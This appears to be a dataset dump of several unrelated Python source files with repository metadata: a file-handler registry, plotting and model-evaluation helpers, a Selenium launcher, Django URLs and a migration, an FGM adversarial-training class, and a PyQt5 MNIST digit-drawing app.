if file_format not in file_handlers:
raise TypeError('Unsupported format: {}'.format(file_format))
handler = file_handlers[file_format]
if file is None:
return handler.dump_to_str(obj, **kwargs)
elif is_str(file):
handler.dump_to_path(obj, file, **kwargs)
elif hasattr(file, 'write'):
handler.dump_to_fileobj(obj, file, **kwargs)
else:
raise TypeError('"file" must be a filename str or a file-object')
def _register_handler(handler, file_formats):
"""Register a handler for some file extensions.
Args:
handler (:obj:`BaseFileHandler`): Handler to be registered.
file_formats (str or list[str]): File formats to be handled by this
handler.
"""
if not isinstance(handler, BaseFileHandler):
raise TypeError(
'handler must be a child of BaseFileHandler, not {}'.format(
type(handler)))
if isinstance(file_formats, str):
file_formats = [file_formats]
if not is_list_of(file_formats, str):
raise TypeError('file_formats must be a str or a list of str')
for ext in file_formats:
file_handlers[ext] = handler
def register_handler(file_formats, **kwargs):
def wrap(cls):
_register_handler(cls(**kwargs), file_formats)
return cls
return wrap
| [
"noreply@github.com"
] | sagardotme.noreply@github.com |
52280d14135fcbe038e6ab859cab81194f5ca7cd | 941eaf75c919c1eaee0415d397b1522d30526e9d | /ML/cluster_graph.py | 8b98f33907c0ed008dbbf89488d0d8c13ecac9d5 | [] | no_license | ldorellana/knowledge | 6ec56c2936ff9d244240a4b15e66e6f037e3f573 | 1f85eceef5855db30819161f7b5087fe0c54c4cc | refs/heads/main | 2023-08-22T07:11:18.448761 | 2021-10-26T23:06:57 | 2021-10-26T23:06:57 | 414,879,432 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,234 | py | # Databricks notebook source
import plotly.io as pio
import pandas as pd
import plotly.express as px
import plotly.graph_objects as go
import plotly.figure_factory as ff
from plotly.subplots import make_subplots
import matplotlib.pyplot as plt
import seaborn as sns
import datetime as dt
import numpy as np
# COMMAND ----------
def set_renderer(render: str='jupyterlab', height: int=950, width: int=500):
newrender = pio.renderers[render]
newrender.width = width
newrender.height = height
pio.renderers.default = render
# COMMAND ----------
def graph_cluster_features(df: pd.DataFrame, clusters: str='cluster', title: str='CLUSTERS FEATURES COMPARISON',
rows: int=2, cols: int=2, height: int=800, width: int=800, horizontal_spacing: float=0.05,
renderer: str='jupyterlab', font: int=14, vertical_spacing: float=0.1):
"""
Takes a pandas dataframe and graph boxplots to compare the features of each cluster
df: pandas DataFrame with the data
clusters: name of the column containing the clusters
title: title to show for the whole plot
rows: number of rows to divide the subplots
cols: number of columns to divide the subplots
height: height of the whole plot
width: width of the whole plot
"""
#set_renderer(renderer, height, width)
fig = make_subplots(rows=rows, cols=cols, subplot_titles=df.columns,
horizontal_spacing = horizontal_spacing, vertical_spacing = vertical_spacing)
#initial position for subplots
col = 0
row = 1
#go thru every feature
for feature in df.columns:
#if the feature is not the cluster colun
if feature != clusters:
#go thru the columns and rows
if col < (cols):
col+= 1
else:
#next row
row+=1
col=1
#add the boxplots to the plot
fig.add_trace( go.Box(y=df[feature],
x=df[clusters],
name='',
boxpoints='all',
text=df.index,
customdata=df,
hovertemplate=(
'<b>店舗: %{text}</b><br>'
'グループ: %{x}<br>'
'訪問率: %{y}%<br>'
'<extra></extra>'
)
),
row=row,col=col, )
#update the layout
fig.update_layout(title_text=title ,showlegend=False,
colorway=px.colors.qualitative.T10, font={'size':font})
fig.update_layout(height=rows*400)
#fig.update_layout(height=height, width=width)
fig.update_xaxes(tickfont=dict(size=12),
categoryorder='category ascending',
title=dict(font=dict(size=14), text='グループ'),
)
return fig
| [
"noreply@github.com"
] | ldorellana.noreply@github.com |
bc765d8f3a13002b4df36a34818d22469358b901 | 08ce9d9c003a97832d0b754c36e448340052d8c0 | /mili_moudle/lib/model_evaluation_plot.py | 13a0d38c0199b857cbc05f84d09543c7c8de46dd | [] | no_license | reference-project/my_work | fb6660d95cdf51210591448d82d5d4fdc29a55e8 | d6fa1ab7f510ac10d814b10d0ed2aeffccb3f53b | refs/heads/master | 2020-05-15T09:20:27.975953 | 2017-11-16T02:08:53 | 2017-11-16T02:08:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,698 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Jun 27 17:15:55 2017
@author: potato
用于绘制模型效果的图的工具
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.metrics import roc_curve,auc
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score,precision_score,recall_score
from scipy import stats
def __tool_sas_rank1(tmp_frame,group):
'''
这个按照 sas 公式实现rank分组功能,公式为
floor(rank*k/(n+1))
'''
lenth = len(tmp_frame)
tmp_frame['rank'] = tmp_frame.ix[:,1].rank(method='min')
tmp_frame['group_num'] = tmp_frame.apply(lambda row : np.floor(row['rank']*group/(lenth+1)), axis=1)
def Model_Evaluation_Plot(model,X,y,plot="all",ksgroup=20):
#plot接受参数如下面字典
graph_show = {"cm":False,"roc":False,"ks":False}
if plot == "all":
for k,v in graph_show.items():
graph_show[k] = True
else:
graph_show[plot] = True #将指定的图设置为展示
#plot Confusion Matrix 混淆矩阵
if graph_show["cm"]:
y_pred = model.predict(X)
cm = confusion_matrix(y,y_pred)
plt.matshow(cm)
plt.title('Confusion matrix')
plt.colorbar()
plt.ylabel('True label')
plt.xlabel('Predicted label')
plt.show()
print("accuracy_score %s"%(str(accuracy_score(y,y_pred))))
print("precision_score %s"%(str(precision_score(y,y_pred))))
print("recall_score %s"%(str(recall_score(y,y_pred))))
#==============================================================================
# """
# 当预测效果较好时,ROC曲线凸向左上角的顶点。
# 平移图中对角线,与ROC曲线相切,可以得到TPR较大而FPR较小的点。
# 模型效果越好,则ROC曲线越远离对角线,极端的情形是ROC曲线经过(0,1)点,即将正例全部预测为正例而将负例全部预测为负例。
# ROC曲线下的面积可以定量地评价模型的效果,记作AUC,AUC越大则模型效果越好。
# """
#==============================================================================
#plot ROC curve
if graph_show["roc"]:
predictions_prob_forest = model.predict_proba(X)
false_positive_rate,recall,threshold = roc_curve(y,predictions_prob_forest[:,1])
roc_auc = auc(false_positive_rate,recall)
plt.title('ROC curve')
plt.ylabel('True Positive rate')
plt.xlabel('False Positive rate')
print("ROC_AUC is %s"%roc_auc)
plt.plot(false_positive_rate,recall)
plt.plot([0, 1], [0, 1], 'r--')
plt.show()
#plot KS
if graph_show["ks"]:
predictions_prob = pd.DataFrame(model.predict_proba(X))
predictions_prob['y'] = y.get_values()
__tool_sas_rank1(predictions_prob,ksgroup)
closPred1 = predictions_prob.groupby('group_num')[1].agg({'minPred1':min,'maxPred1':max})
colsy = predictions_prob.groupby('group_num')['y'].agg({'bad':sum,'N':len})
colsy['good'] = colsy['N']-colsy['bad']
colscumy = colsy.cumsum(0)
colscumy = colscumy.rename(columns={'bad':'cum1','N': 'cumN','good':'cum0'})
colscumy['cum1Percent'] = colscumy['cum1']/colscumy['cum1'].max()
colscumy['cum0Percent'] = colscumy['cum0']/colscumy['cum0'].max()
colscumy['cumDiff'] = abs(colscumy['cum1Percent']-colscumy['cum0Percent'])
ks_file = pd.concat([closPred1,colsy,colscumy],axis=1)
ks_file['group'] = ks_file.index
x = np.arange(1,ks_file.shape[0]+1)
plt.plot(x,ks_file['cum0Percent'], label='cum0Percent',marker='o')
plt.plot(x,ks_file['cum1Percent'], label='cum1Percent',marker='o')
plt.plot(x,ks_file['cumDiff'], label='cumDiff',marker='o')
plt.legend()
plt.title('KS')
plt.legend(loc='upper left')
datadotxy=tuple(zip((x+0.2),ks_file['cumDiff']))
for dotxy in datadotxy:
plt.annotate(str(round(dotxy[1],2)),xy=dotxy)
plt.xlabel(u"group", fontproperties='SimHei')
#plt.savefig("F:\moudle\modle\\KS.png",dpi=2000)
plt.show()
p = pd.DataFrame(model.predict_proba(X),index = X.index)
p['y'] = y
proba_y0 = np.array(p[p['y']==0][1])
proba_y1 = np.array(p[p['y']==1][1])
ks = stats.ks_2samp(proba_y0,proba_y1)[0]
print("K-S score %s"%str(ks))
if __name__ == "__main__":
pre_prob = pd.DataFrame(lr.predict_proba(X_test))
pre_prob['y'] = y_test.reset_index().iloc[:,-1]
ks_file = model_plot(pre_prob) | [
"FCY563991"
] | FCY563991 |
c98aa212d01c7daa0c18dcb80c0233eebd8e02bb | 8dfdebb981abbe02abbf178cfd68e76154ee183b | /tool.py | 5fcd3781ec32af2d9c64d328df46ee1734ce3698 | [] | no_license | valeriocos/busfactor | 1be45656cc7c24213f1a76b6f4a93d47c8e89ff5 | 13341dbbc6ab873c8b00e2a4c40a2dbebcac170b | refs/heads/master | 2020-12-25T16:25:36.773740 | 2017-07-11T16:03:25 | 2017-07-11T16:03:25 | 68,021,592 | 0 | 0 | null | 2016-09-12T15:25:51 | 2016-09-12T15:25:50 | null | UTF-8 | Python | false | false | 2,019 | py | __author__ = 'atlanmod'
import subprocess
import os
import signal
import sys
import time
import psutil
from selenium import webdriver
from bus_factor_gui import BusFactor
WEB_BROWSER_PATH = 'C:\chromedriver_win32\chromedriver.exe'
pro = None
gui = None
#if this value is false, the script will prompt the content of the data folder in a HTML page
execute_bus_factor = False
def is_process_running(pid):
found = False
for p in psutil.process_iter():
try:
if p.pid == pid:
found = True
break
except psutil.Error:
pass
return found
def start_server():
global pro
print "Starting server..."
cmd = 'python -m SimpleHTTPServer'
pro = subprocess.Popen(cmd, shell=True)
def close_browser(driver):
driver.close()
def start_gui():
global gui
gui = subprocess.Popen([sys.executable, "bus_factor_gui.py"] + ["-n", "True"])
def open_browser():
driver = webdriver.Chrome(executable_path=WEB_BROWSER_PATH)
driver.get("http://localhost:8000/index.html")
driver.refresh()
return driver
def shutdown_server():
print "Shutting down server..."
os.kill(pro.pid, signal.SIGTERM)
def delete_notification():
if os.path.exists(BusFactor.NOTIFICATION):
os.remove(BusFactor.NOTIFICATION)
def browser_is_open(driver):
open = True
try:
driver.current_url
except:
open = False
return open
def notified():
flag = False
if os.path.exists(BusFactor.NOTIFICATION):
flag = True
delete_notification()
return flag
def main():
delete_notification()
if execute_bus_factor:
start_gui()
while is_process_running(gui.pid):
time.sleep(10)
if notified():
break
start_server()
driver = open_browser()
open = True
while open:
time.sleep(1)
open = browser_is_open(driver)
shutdown_server()
if __name__ == "__main__":
main()
| [
"valerio.cosentino@gmail.com"
] | valerio.cosentino@gmail.com |
aca9efeda591797902aa1b2a8db77d2e97a960b3 | 38ccd54385a2bf7b8bdae0fc2c7a3f0c18388e93 | /src/app/urls.py | 4756a0c1b442c5c54f67b333acad1d32bc16d33b | [] | no_license | juzi198528/EndlessSummer | 35e35d4e50a445729a1a3e9be9a5abfe0258ee44 | 00104365b9d063ee1638fc292e6779e77e83a8d7 | refs/heads/master | 2021-01-10T09:34:58.210939 | 2015-07-02T14:23:28 | 2015-07-02T14:23:28 | 36,563,053 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 865 | py | from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(r'^admin/', include(admin.site.urls)),
url(r'^login$', 'app.views.login'),
url(r'^logout$', 'app.views.logout'),
url(r'^doLogin', 'app.views.doLogin'),
url(r'^$', 'app.views.index'),
url(r'^parts/index$', 'parts.views.index'),
url(r'^parts/loadAll', 'parts.views.loadAll'),
url(r'^parts/search', 'parts.views.search'),
url(r'^parts/consume$', 'parts.views.consume'),
url(r'^parts/consume/search', 'parts.views.consumeSearch'),
url(r'^parts/consume/loadAll', 'parts.views.consumeLoadAll'),
url(r'^parts/incoming$', 'parts.views.incoming'),
url(r'^parts/incoming/search', 'parts.views.incomingSearch'),
url(r'^parts/incoming/loadAll', 'parts.views.incomingLoadAll'),
)
| [
"Administrator@WIN-8GRLM60SKUV"
] | Administrator@WIN-8GRLM60SKUV |
a52454850b304a36ed7bdc5226f5e936ea6652f3 | e76c6f7b95a0f21eb4b824e4edeadd79295b1929 | /classification_by_bert/model/FGM.py | 24450b883327cabb16cf3f5f06495641afc80c27 | [] | no_license | WuDiDaBinGe/DAGUAN2021_PretrainedModelTextClasssifier | 5ff5c21ae469d7b9cb531d0cf326472f1ee8e000 | 5c160ce6328ad0d0f0439c6d495bfea1ef96a2d1 | refs/heads/main | 2023-08-01T09:14:44.745205 | 2021-09-18T14:12:11 | 2021-09-18T14:12:11 | 397,621,004 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 984 | py | # -*- coding: utf-8 -*-
# @Time : 2021/9/8 下午2:54
# @Author : WuDiDaBinGe
# @FileName: FGM.py
# @Software: PyCharm
import torch
class FGM():
def __init__(self, model):
super(FGM, self).__init__()
self.model = model
self.backup = {}
def attack(self, epsilon=1., emb_name='word_embeddings'):
for name, param in self.model.named_parameters():
if param.requires_grad and emb_name in name:
self.backup[name] = param.data.clone()
norm = torch.norm(param.grad)
if norm != 0 and not torch.isnan(norm):
r_at = epsilon * param.grad / norm
param.data.add_(r_at)
def restore(self, emb_name='word_embeddings'):
for name, param in self.model.named_parameters():
if param.requires_grad and emb_name in name:
assert name in self.backup
param.data = self.backup[name]
self.backup = {}
| [
"1151680016@qq.com"
] | 1151680016@qq.com |
53be767ec0af9da1b6e57546b948c92ff061651d | c5b863c2e6a13111af6bb0eb6fd400eab668c194 | /BANCO-DE-DADOS/tamanho.py | b248f912d0dce724b341865c84ecdb3492ef0f51 | [] | no_license | Demerson-Demy/Ceunsp-ProjetoADS | b5bfc461cc34769a62fe06f6e51f4f9e0fca1846 | a58018e12c8a4c7088575df3003efb0ea89a5054 | refs/heads/main | 2023-07-18T11:24:07.237857 | 2021-09-09T01:07:19 | 2021-09-09T01:07:19 | 393,188,629 | 0 | 0 | null | 2021-08-05T22:54:27 | 2021-08-05T22:54:27 | null | UTF-8 | Python | false | false | 389 | py | import sqlite3
conector = sqlite3.connect("vendas1.db")
cursor = conector.cursor()
# TABELA Marca
cursor.execute("""
CREATE TABLE Tamanho (
Marca VARCHAR (3) NOT NULL PRIMARY KEY,
Tamanho INTEGER NOT NULL
);
""")
conector.commit()
cursor.close()
conector.close()
print("Abra a pasta do programa e veja se o arquivo esta lá")
print("Fim do Programa")
| [
"matheussabatine1717@gmail.com"
] | matheussabatine1717@gmail.com |
e95f81c2edaab21bbe2f5f9e621eae62b13fdc86 | 9f1039075cc611198a988034429afed6ec6d7408 | /tensorflow-stubs/_api/v1/keras/datasets/cifar10/__init__.pyi | f00ca8b56bea50c2b28c37c450e8e377366f9b62 | [] | no_license | matangover/tensorflow-stubs | 9422fbb1cb3a3638958d621461291c315f9c6ec2 | 664bd995ef24f05ba2b3867d979d23ee845cb652 | refs/heads/master | 2020-05-23T12:03:40.996675 | 2019-05-15T06:21:43 | 2019-05-15T06:21:43 | 186,748,093 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 220 | pyi | # Stubs for tensorflow._api.v1.keras.datasets.cifar10 (Python 3)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
from tensorflow.python.keras.datasets.cifar10 import load_data as load_data
| [
"matangover@gmail.com"
] | matangover@gmail.com |
c70df226052d8f417c68f5042c2658c51fd492ef | 77abb9d33eedb68da3cb07db5c9cde94f24c7316 | /apps/transcripts/migrations/0006_mission_wiki.py | d43d37b12afd71a36046769b86770e971e2c1126 | [] | no_license | Spacelog/kallisto | 81aa62341c6d2925077fddae55fcf4280a74fed7 | f9644a304b98b358144a39cd7e6eba4f2e01c10e | refs/heads/master | 2020-12-29T02:19:50.069589 | 2017-04-15T18:55:08 | 2017-04-15T18:56:26 | 28,003,946 | 6 | 4 | null | 2016-02-17T08:18:27 | 2014-12-14T18:44:01 | Python | UTF-8 | Python | false | false | 489 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('transcripts', '0005_mission_active'),
]
operations = [
migrations.AddField(
model_name='mission',
name='wiki',
field=models.URLField(help_text='URL of wiki page for useful notes.', null=True, blank=True),
preserve_default=True,
),
]
| [
"james@tartarus.org"
] | james@tartarus.org |
913fca80ba4ca3f8ecb38be59cd12e79ec3b9624 | 92c4fa8ea5ed8447da2c6104960f8a8da8cd03ec | /build/lib/accounting/accounting/doctype/sales_invoice/test_sales_invoice.py | a23b48a9ff041d6ace9aef685c0ebeca84e092d3 | [
"MIT"
] | permissive | mincerray1/accounting | 9c4f69b8e4e6f20bb7563d3cbf1fd4e2907d8d77 | 74867a71918a99500fb78c75652841bcb8e509a1 | refs/heads/master | 2023-03-20T19:01:53.271813 | 2021-01-14T16:01:17 | 2021-01-14T16:01:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 211 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2020, Shariq and Contributors
# See license.txt
from __future__ import unicode_literals
# import frappe
import unittest
class TestSalesInvoice(unittest.TestCase):
pass
| [
"sharique.rik@gmail.com"
] | sharique.rik@gmail.com |
1ff7a39ec3597863b3679337588d619360ca90e2 | 45057b4f2c48746258ac45e21e1e0fb74c990ee0 | /hw1/p4_utils.py | 43913e1e8f39f1a272b51669bb2a394ea5aa79f6 | [] | no_license | WingConghyc/ECE276B | cd6c2f35918c3d8fc1ac9d442efb48c138bcb2e2 | ecd8803c7ca7c1f250bfaf5754474b418f9bda65 | refs/heads/master | 2022-01-07T14:51:02.623422 | 2019-06-16T06:32:12 | 2019-06-16T06:32:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,079 | py | import numpy as np
import sys
import os.path
def load_data(input_file):
'''
Read deterministic shortest path specification
'''
with np.load(input_file) as data:
n = data["number_of_nodes"]
s = data["start_node"]
t = data["goal_node"]
C = data["cost_matrix"]
return n, s, t, C
def plot_graph(C,path_nodes,output_file):
'''
Plot a graph with edge weights sepcified in matrix C.
Saves the output to output_file.
'''
from graphviz import Digraph
G = Digraph(filename=output_file, format='png', engine='neato')
G.attr('node', colorscheme='accent3', color='1', shape='oval', style="filled", label="")
# Normalize the edge weights to [1,11] to fit the colorscheme
maxC = np.max(C[np.isfinite(C)])
minC = np.min(C)
norC = 10*np.nan_to_num((C-minC)/(maxC-minC))+1
# Add edges with non-infinite cost to the graph
for i in range(C.shape[0]):
for j in range(C.shape[1]):
if C[i,j] < np.inf:
G.edge(str(i), str(j), colorscheme="rdylbu11", color="{:d}".format(int(norC[i,j])))
# Display path
for n in path_nodes:
G.node(str(n), colorscheme='accent3', color='3', shape='oval', style="filled", label=str(n))
G.view()
def save_results(path, cost, output_file):
'''
write the path and cost arrays to a text file
'''
with open(output_file, 'w') as fp:
for i in range(len(path)):
fp.write('%d ' % path[i])
fp.write('\n')
for i in range(len(cost)):
fp.write('%.2f ' % cost[i])
if __name__=="__main__":
#input_file = sys.argv[1]
input_file = './data/problem1.npz'
file_name = os.path.splitext(input_file)[0]
# Load data
n,s,t,C = load_data(input_file)
# C = np.fill_diagonal(C, 0)
# Generate results
path = np.array([42,43,44,53,61,70,79,80,81,82,83,84,85,86,87,98,109])
cost = np.array([16.0,15.0,14.0,13.0,12.0,11.0,10.0,9.0,8.0,7.0,6.0,5.0,4.,3.0,2.0,1.0,0.0])
# Visualize (requires: pip install graphviz --user)
plot_graph(C,path,file_name)
# Save the results
save_results(path,cost,file_name+"_results.txt")
| [
"arthas960426@gmail.com"
] | arthas960426@gmail.com |
dff218f2d3e619dc6787100c4a5e2b2bd86f8b49 | 3b048e8b62b36b039528fc636dcbee1124c8cb20 | /PyQt5 ile Rakam Sınıflandırma(Digit Classification GUI Projesi)/digit_classification_project_w_pyqt5.py | afdeee4b6bd928749f6993a6fe1ae01bd79cf35d | [] | no_license | rabia-koc/Python_GUI | c39b36ef6eaa11df91bb1638569bb30d147e074b | efe4b1e09777195e92e19ad316550c0de146e56c | refs/heads/main | 2023-04-10T12:21:36.961200 | 2021-04-09T18:51:16 | 2021-04-09T18:51:16 | 356,365,607 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,398 | py | # libraries
from PyQt5.QtWidgets import *
from PyQt5.QtGui import QIcon, QPixmap, QImage, QPainter, QPen # icon and load image
from PyQt5.QtCore import Qt, QPoint
import sys
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.image as mpimg # load image
import cv2 # open-cv use for image resize
## Convolutional Neural Network
import keras
from keras.datasets import mnist # keras kütüphanesi içinde bulunan mnist veri setini kullanmak için
from keras.models import Sequential, load_model
from keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D # CNN için
#%% preprocess
(x_train, y_train),(x_test, y_test) = mnist.load_data() # veri setini yüklüyoruz. 2 tane tupple ve içinde 2'şer tane variable return edecek.
# x_train: 60 bin tane resim var, x_train data setini kullanarak CNN eğiticez
# x_test data seti ile bunu test edicez. x_test: 10 bin tane resim var.
# test ederken daha önce göstermediğim resimlerle test ediyoruz.
# x_train ve x_test resimlerinin img'larının label'leri neler? yani hangi sınıfa ait olduğu bilgisi nerede saklanıyor?
# y_train ve y_test array'lerinde saklanıyor.
plt.figure()
i = 55
plt.imshow(x_train[i], cmap = "gray") # x_train datasının 55. indeksine bakıyor, resmi gri bir hale getiriyor.
print("Label: ",y_train[i])
plt.axis("off") # resim göstereceğimiz için eksenleri kapatıyoruz.
plt.grid(False) # plot üzerindeki gridleri kaldırdı.
# 8 sayısı karşımıza çıkıyor.
# bu resimler 0-9 sayılarından oluşuyor
# bu veriyi nöral networkte kullanılabilir hale getiricez.
# yani keras kütüphanesinin input olarak aldığı belli kurallar var
# size: 60000,28,28, 1 tane de chanel istiyor. Chanel: resmin RGB mi yoksa tek renk siyah beyaz mı olduğu
# bu veri setinin size'ni 60000,28,28, 1 şeklinde ayarlamamız gerekiyor.
img_rows = 28
img_cols = 28
# 60 bin alabilmek için x_train.shape'nin 0.indeksini alıyoruz, sonra 28,28,1 olarak devam ediyoruz.
x_train = x_train.reshape( x_train.shape[0],img_rows,img_cols,1)
x_test = x_test.reshape( x_test.shape[0],img_rows,img_cols,1) # x_testide böyle yapıyoruz
input_shape = (img_rows,img_cols,1) # input shape de chanel değeri ekledik çünkü keras böyle kabul ediyor.
# normalization:
# her bir inputun benzer dağılıma sahip olmasını sağlayan önemli bir adımdır.
# input dediğimiz şeyler resmimizin her bir pikseli yani 28x28'lik matrisin her bir değeri demek.
# normalization işleminden sonra nöral network'ün eğitimi daha hızlı tamamlanır.
# bir resim nasıl normalization edilir?
# resimlerde normalization işlemi gerçekleştirmek için 255 değerine bölmemiz yeterlidir.
# normalization işlemi benim verimi 0 ve 1 arasına sıkıştırmak demektir, 255 bölmek bu işlemi gerçekleştirir.
x_train = x_train.astype("float32") # bilgi kaybetmemek adına bu çevirmeyi yaptık
x_test = x_test.astype("float32")
x_train /= 255 # x_train = x_train/255
x_test /= 255
# Bunların içinde labelleri içeren array'ler var, bu array'leri eğitebilmek için categorical hale getirmem gerekiyor
# aslında binary görünümlü hale getirmek demek
num_classes = 10
y_train = keras.utils.to_categorical(y_train, num_classes) # 10 tane sınıfım var
y_test = keras.utils.to_categorical(y_test, num_classes)
# %% CNN
model_list = [] # modelimi depolucam
score_list = [] # soore depolucam
batch_size = 256
epochs = 5
# 2 tane modeli aynı anda eğitmek için bir for döngüsü çeviricem,
# for döngüsü çevirmeden önce bu 2 model arasındaki farklılık: modellerimizdeki hidden layer'larda bulunan nöron sayısıydı.
# bunun için bir array oluşturuyoruz.
filter_numbers = np.array([[16,32,64], [8,16,32]]) # model1 ve model2 deki nöron sayıları
# 2 dedik çünkü 2 modelimiz var
for i in range(2):
print(filter_numbers[i]) # hangi nöronları kullanacağımızı print ettirdik.
model = Sequential() # sequential bir dizi oluşturduk.
# kaç tane nöron olucak? filter'ın i.indeksinin 0.indeksi kadar yani 16 tane nöronum olucak
model.add(Conv2D(filter_numbers[i,0], kernel_size = (3,3), activation = "relu", input_shape = input_shape))
model.add(Conv2D(filter_numbers[i,1], kernel_size = (3,3), activation = "relu")) # 1.indeks için
# burda tekrardan input_shape gerek yok çünkü bunlar sequential olduğu için ilk oluşturduğumuz Conv2D outputu bir sonraki gelenin inputu oluyor.
# bunlar birbirinin outputunu ve inputunu biliyorlar.
model.add(MaxPooling2D(pool_size = (2,2)))
model.add(Dropout(0.25))# %25 oranında drop yapacağı anlamına geliyor.
# diyelim ki 8 tane nöronum var, %25'i 2 yapıyor.
# her seferinde bu 8 tane nörondan 2'sini drop yapıcam yani söndürücem sanki bunlar kapalıymış orda yokmuş gibi davranıcam.
# future extraction kısmı tamamlandı şimdi classification kısmına başlıyoruz
model.add(Flatten()) # matrisleri düzleştiriyoruz.
model.add(Dense(filter_numbers[i,2], activation = "relu")) # 2.indekste bulunan nöron sayısını kullanarak yeni bir hidden layer oluşturabiliriz.
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation = "softmax")) # bu output layer olucak.
# softmax fonksiyonu: class sayısı 2'den fazlaysa kullanılan bir yöntemdir.
# artık output layerdeki nöron sayısı num_classes'a eşit yani 10'a eşit.
# nöral network'ü eğitmek için kullanacağımız fonksiyonları ve sonucu parametrede de değerlendirme için kullanacağımız metrik in ne olduğunu belirliyeceğiz.
model.compile(loss = keras.losses.categorical_crossentropy, optimizer = keras.optimizers.Adadelta(),
metrics = ["accuracy"])
# loss fonksiyonu: keras kütüphanesinin losslarının içerisinde bulunan categorical_crossentropy olucak.
# model eğitim aşaması:
# x_train ve y_train ile eğitim başlıyacak
# verbose = 1: 0 ve 1 değerlerini alıyor. 1 yaptığım zaman modelim eğitilirken konsol kısmında eğitim sonuçlarını aynı anda bana göstermesini sağlıyor.
history = model.fit(x_train, y_train, batch_size = batch_size, epochs = epochs, verbose = 1, validation_data = (x_test, y_test))
# test işlemi için:
score = model.evaluate(x_test, y_test, verbose = 0)
print("Model {} Test Loss: {}".format(i+1, score[0])) # i 0 olsun, i+1: 1 olur, model1'im yani burda score içinde indeksi o olan yerdeki değer
print("Model {} Test Accuracy: {}".format(i+1, score[1]))
model_list.append(model) # modeli deopladık.
score_list.append(score) # score'leri depoladık.
model.save("model" + str(i+1) + ".h5") # modeli kaydetme işlemi
# model1: 3 layer=> 16, 32, 64 tane nöron
# model2: 3 layer=> 8, 16, 32 tane nöron
# %% modelleri yükleme işlemi
model1 = load_model("model1.h5")
model2 = load_model("model2.h5")
#%% Canvas
# sınıflandırmak istediğimiz sayıyı draw canvas methodunu kullanarak arayüze çizmiş olucaz.
class Canvas(QMainWindow):
def __init__(self):
super().__init__()
self.width = 400
self.height = 400
self.setWindowTitle("Draw Digit App")
self.setGeometry(50, 100, self.width, self.height)
# çizilebilir hale gelmesi için QImage ekledik.
self.image = QImage(self.size(),QImage.Format_RGB32) # self.size: 400'e 400 return eden bir method.
# yani bir window'um var bu window içerisine image classını kullanarak bir tane resim eklemiş oluyorum.
self.image.fill(Qt.black) # yani ekranı siyah yap demek.
self.lastPoint = QPoint()
self.drawing = False # başlangıçta false olucak çünkü çizmiyorum
# image_array
self.im_np = np.zeros([self.width, self.height]) # bir array oluşturduk.
# resmi çizdikten sonra kaydetmek için buton oluşturduk.
button1 = QPushButton("Ok!", self)
button1.move(2, 2)
button1.clicked.connect(self.enterFunction)
self.show()
# image çağırmak için;
def paintEvent(self, event):
canvasPainter = QPainter(self) # image boyamak için kullanacağımız bir yapı
canvasPainter.drawImage(self.rect(), self.image, self.image.rect()) # nasıl bir image çizeceğimizi ayarlıyoruz.
# bir tane pointer oluşturuyoruz.
def enterFunction(self):
ptr = self.image.constBits() # bize pointer return ediyor.
ptr.setsize(self.image.byteCount()) # image'nin byte sayısına kadar boyutunu belirlemiş oluyoruz.
# image'min üzerine bir şey çizicem bu 400x400'lük matrisin içini çizdiğim şey ile doldurmam lazım.
# örneğin; arka plan siyah olduğu için matrisimin büyük çoğunluğu black yani 0 değerine sahip olacak.
# ama ben buraya bir şey çizdiğim zaman beyazla çizicem ve bu çizdiğim yerlerde 1 değerine sahip olacaklar.
self.im_np = np.array(ptr).reshape(self.width, self.height,4) # bir tane matris belirliyoruz.
# self.im_np edebilmek için yukarda define etmem lazım.
self.im_np = self.im_np[:,:,0] # RGB renklerden sadece bir tanesini aldık
self.im_np = self.im_np/255.0
# normalization ediyoruz. siyahlar 0 dı beyazlar 1 di
# ama bu normalde RGB olacağı için normalde siyaha yaklaştıkça renkler 0'a, beyaza yaklaştıkça RGB renklerin karışımı 255 olmak zorunda
# bir resmi normalization yapmak için onu 255 bölmek yeterli. doğru tahminler yapabilmek için bu işlemi yaptık.
# enter fonksiyonuna basınca ne olacağını yazıyoruz.
# her yer siyahsa toplamı da 0 olacaktır. yani buraya hiç bir çizmemişim demektir.
if np.sum(self.im_np) ==0:
print("Please write a digit")
# eğer bir şeyler çizdiysem
else:
plt.figure(figsize = (1, 1), dpi = 200)
plt.imshow(self.im_np, cmap = "gray")
plt.axis("off")
plt.grid(False)
plt.savefig("input_img.png") # resmi kaydediyorum çünkü daha sonra bu resmi tekrarda yüklücem ve sınıflandırmaya sokucam.
self.close() # en sonda canvas window'u kapatmak için
def mousePressEvent(self, event):
# mousenin sol butonunu kullanırsam bastığım noktanın pozisyonunu al ve lastpointe eşitle
if event.button() == Qt.LeftButton:
self.lastPoint = event.pos()
self.drawing = True # bastım ve çizmeye başladığım için true yaptık.
print(self.lastPoint)
# mousenin sol tuşuna bastıysam ve drawing true ise
def mouseMoveEvent(self, event):
# birden fazla tıkladığım için buttons yaptık
if (event.buttons() == Qt.LeftButton) & self.drawing:
painter = QPainter(self.image) # içine bizim oluşturduğumuz resmi alıcak.
painter.setPen(QPen(Qt.white, 20, Qt.SolidLine, Qt.RoundCap, Qt.RoundJoin))
# 1.parametre: içine beyaz bir şey çizmek için,
# 2.parametre: boyutu 20
painter.drawLine(self.lastPoint, event.pos()) # ilk tıkladığım noktadan line çizicem
self.lastPoint = event.pos()
self.update() # bu yaptıklarımı hep güncellemek için
# kontrol niteliğinde bir event yani tam çizmeyi bitirdiysem çizme işlemini kapatıyor.
